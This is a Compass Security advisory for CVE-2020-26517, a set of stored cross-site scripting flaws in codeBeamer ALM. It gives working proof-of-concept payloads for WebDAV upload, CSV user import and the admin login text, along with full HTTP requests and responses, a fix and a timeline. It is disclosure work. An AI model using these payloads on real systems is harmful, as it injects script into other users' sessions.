#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  codeBeamer Application Lifecycle Management (ALM) [1]
# Vendor:   Intland Software
# CSNC ID:  CSNC-2020-012
# CVE ID:   CVE-2020-26517
# Subject:  Multiple Cross-Site Scripting (XSS) [3]
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Alex Joss and Emanuele Barbeno (advisories@compass-security.com)
# Date:     02.06.2021
#
#############################################################

Introduction:
-------------
codeBeamer Application Lifecycle Management (ALM) provides Project-, Task-, 
Requirement-, Test- Change-, Configuration-, Build-, Knowledge- and Document 
management in a single, secure environment. It enables software and hardware 
development to be more collaborative, transparent and productive. [2]

Compass Security discovered a security flaw in codeBeamer ALM application, 
which allows injecting client-side code into the application in different
places.

Affected:
---------
Vulnerable:
	10.0.0-final
	21.04-final

No other version was tested, but it is believed for the older versions to be 
vulnerable as well.

Technical Description
---------------------
It is possible to perform XSS attacks on different places:
	* Using the WebDAV functionality to upload files to a project (Authn users)
	* Using the users import functionality (Admin only)
	* Changing the login text in the application configuration (Admin only)
	
--- WebDAV XSS ---

It is possible to exploit the XSS vulnerability by uploading an HTML file using 
the WebDAV service provided by the application under the URL /cb/webfolder/. 

Upload the file.html file containing the XSS payload to the project folder 
using any WebDAV client software available or the following request. The 
Authorization header contains the HTTP Digest authentication of the user:
```
PUT /cb/webfolder/<PROJECT_NAME>/file.html HTTP/1.1
User-Agent: Rei.Fs.WebDAV/1.15.5
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Authorization: [CUT BY COMPASS]
Host: localhost:8080
Content-Length: 76
Expect: 100-continue
Connection: close

<html>
<head>
</head>
<body>
<script>alert(1)</script>
</body>
</html>
```

The application accepted the input file by sending the following response:
```
HTTP/1.1 201 201
Date: Mon, 11 May 2020 13:21:31 GMT
Server: Apache/2.2.34 (Win64) mod_jk/1.2.40 mod_ssl/2.2.34 OpenSSL/1.0.2l
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html
Content-Length: 0
```

The XSS payload can be executed in the WebDAV application by accessing the 
following URL: /cb/webfolder/<PROJECT_NAME>/file.html

The XSS payload can be also executed using the standard interface provided 
by the application. Once logged-in to the application, the victim has to click 
the following links: Projects -> <PROJECT_NAME> -> Documents. 
The malicious file is present and the user can open it

HTTP Request to retrieve the content of the file.html file:
```
GET /cb/doc/405516/content?raw=true&link_id=405517 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) 
	Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
	image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: https://localhost:8080/cb/project/246/documents
Cookie: JSESSIONID=3314d244-0801-4ffe-8742-710c9688c55e; 
	JSESSIONID=C12908184C46705CC3006F54947DD716
Upgrade-Insecure-Requests: 1
```

HTTP Response containing the malicious XSS payload. Since the 
Content-Disposition response header has the inline keyword, the content of 
the file is executed on the user's browser:
```
HTTP/1.1 200 200
Date: Mon, 11 May 2020 13:27:55 GMT
Server: Apache/2.2.34 (Win64) mod_jk/1.2.40 mod_ssl/2.2.34 OpenSSL/1.0.2l
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Disposition: inline; filename="file.html"
Accept-Ranges: none
Content-Language: en-CH
Content-Length: 76
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>
</head>
<body>
<script>alert(1)</script>
</body>
</html>
```

--- Users import XSS ---

In order to exploit the XSS via users import, you have to use the following 
CSV file containing four different XSS payloads:
```
<img src='x' onerror='alert(1)'>,Regular User,ALM - Users with named license,
	<img src='x' onerror='alert(1)'>,<img src='x' onerror='alert(1)'>,
	<img src='x' onerror='alert(1)'>,06-05-20 00:49,Activated
```

Using a system admin account you can import the CSV file above by clicking 
the following buttons on the UI: 
	System Admin -> User Accounts -> Import Accounts ->
		CSV file in Microsoft Excel Style

In the Assign Columns of Imported Data page, set the XSS payload to the 
following fields:
	* User Name
	* First Name
	* Last Name
	* Email
And complete the user's import.

The XSS payload will be executed when other users receives the malicious user's 
details from the API /cb/ajax/getUserFieldSuggestions.spr or another user 
administrator tries to open user's details of the malicious account.

--- Login text XSS ---

To exploit XSS in the login page, a system administrator have set the "Login Text" 
in the site configuration as the following by enabling the HTML view of the textbox:
```
before login text
<script>alert(1)</script>
after login text
```

The XSS payload is executed anytime a user opens the login page of the application.

The following is the response content of the login page containing the XSS payload:
```
HTTP/1.1 200 200
Date: Mon, 11 May 2020 13:51:30 GMT
Server: Apache/2.2.34 (Win64) mod_jk/1.2.40 mod_ssl/2.2.34 OpenSSL/1.0.2l
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Set-Cookie: JSESSIONID=21e84136-34b5-48a7-9236-0a39ddd342f1; Path=/cb/; Secure; 
	HttpOnly; SameSite=Lax
Content-Language: en-US
Content-Length: 13823
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" 
	"http://www.w3.org/TR/html4/loose.dtd">
[CUT BY COMPASS]
</div><div class="right column">before login text
<script>alert(1)</script>
after login text</div><!--
	--></div>
[CUT BY COMPASS]
```

Workaround / Fix:
-----------------
Dangerous characters should be encoded on output according to the encoding 
rules of the respective type of context. The whole code should be analyzed for 
it and updated accordingly. For regular HTML body content, use HTML encoding:
	* < -> &lt;
	* > -> &gt;
	* " -> &quot;
	* ' -> &apos;
	* & -> &amp;

Timeline:
---------
2020-05-14:     Discovery by Alex Joss and Emanuele Barbeno
2020-05-18:     Initial vendor notification
2020-05-18:     Initial vendor response
2020-10-02:     Assigned CVE-2020-26517
2021-06-02:     Public disclosure


References:
-----------
[1] https://intland.com/codebeamer/application-lifecycle-management/
[2] https://codebeamer.com/cb/wiki/199594
[3] https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS)